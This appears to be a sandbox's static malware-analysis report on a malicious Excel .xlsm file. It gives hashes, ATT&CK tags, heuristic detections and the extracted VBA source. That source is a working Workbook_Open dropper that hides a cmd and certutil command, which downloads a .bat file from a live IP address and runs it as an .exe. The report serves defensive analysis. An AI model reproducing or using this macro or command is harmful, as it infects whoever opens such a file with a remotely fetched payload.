Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 7b5672bb126b9c93…

MALICIOUS

Office (OOXML) / .XLSM

27.3 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-03-02
MD5: 1699e64f653a7abf420811a44594be2b SHA-1: 59dd86a0dfc621e6a957363d8496d8198008e097 SHA-256: 7b5672bb126b9c9360ca6373b75fbc00af40888c20d40391f55bb239a786b934
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open macro executes a command to download a batch file from the URL http://18.193.102.232/de/IMG006075200016.bat using certutil and then executes the downloaded file. This indicates the document is a dropper designed to fetch and run a second-stage payload.

Heuristics 7

  • ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://18.193.102.232/de/IMG006075200016.bat In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
44ffe53315a084bc46cc98d0b166f8aa0c718140ab9c1b31b10080c67f227b64		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1115 bytes
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
PID = Shell("cmd /c certutil.exe -urlcache -split -f ""http://18.193.102.232/de/IMG006075200016.bat"" Prdfwtzkgivbfbwpal.exe.exe && Prdfwtzkgivbfbwpal.exe.exe", vbHide)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin
3541b1c8a1c27814d950e09c062c27f77a82fb1f1f4263965d889d7f91ee9d16		 vba-project OOXML VBA project: xl/vbaProject.bin 5632 bytes
Detection
ClamAV: Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.